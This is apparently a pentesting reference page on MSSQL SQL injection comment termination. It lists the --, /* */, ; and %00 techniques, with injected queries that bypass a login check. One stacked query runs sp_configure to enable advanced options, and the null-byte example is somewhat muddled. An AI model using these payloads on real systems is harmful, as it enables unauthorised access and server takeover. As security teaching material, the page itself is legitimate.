mssql

Comment Out Query

How to comment out the remainder of a query in MSSQL

Basics Last updated: March 15, 2025
basicssyntaxcomments

Comment Out Query

In SQL injection attacks, commenting out the remainder of a query is often necessary to ensure that the injection payload works correctly without syntax errors. This technique is commonly known as “comment termination.”

In Microsoft SQL Server (MSSQL), you can use the following methods to comment out the rest of a query:

Comment TypeSyntaxDescription
Single-line comment--Requires a space after the dashes
Inline/block comment/*...*/Can span multiple lines
Batch separator;Terminates the current statement
Nullbyte%00Application-layer string truncation (see notes)

Examples

-- Example 1: Using -- to comment out the rest of the query
SELECT * FROM Users WHERE username = 'admin'-- ' AND password = 'password'

-- Example 2: Using /* */ for inline commenting
SELECT * FROM Users WHERE username = 'admin'/* ' AND password = 'password' */

-- Example 3: Using ; to terminate and start a new query
SELECT * FROM Users WHERE username = 'admin'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE;

Example 4: Null byte truncation (application-layer, not SQL Server)

The %00 null byte is not a SQL Server comment — it exploits C-style string handling in certain application frameworks/drivers that treat null bytes as string terminators.

-- Attacker input (URL-encoded):
username=admin'%00&password=anything

-- Application receives and URL-decodes to:
admin'\0  (where \0 is the null byte)

-- If the framework truncates at null byte, SQL Server receives:
SELECT * FROM Users WHERE username = 'admin'' AND password = '...'
                                          ^ query truncated here

This technique only works in specific environments (classic ASP, older PHP configurations, certain ODBC drivers). Modern frameworks typically pass the null byte through or reject it. See note 5 below for details.

Notes

  1. MSSQL requires a space or new line after the -- comment syntax.
  2. In some cases, MSSQL ignores comment syntax in strings, so ensure that your injection point has proper quoting.
  3. Using the ; batch separator can be particularly powerful as it allows execution of additional SQL statements.
  4. When using batch separators, be aware that permissions and error handling may differ from the original query.
  5. The null byte (%00) is not recognized by SQL Server itself — it works by truncating the string at the application layer before the query reaches the database. This behavior depends on the web framework/driver (e.g., classic ASP, certain PHP configurations) and may not work in modern stacks.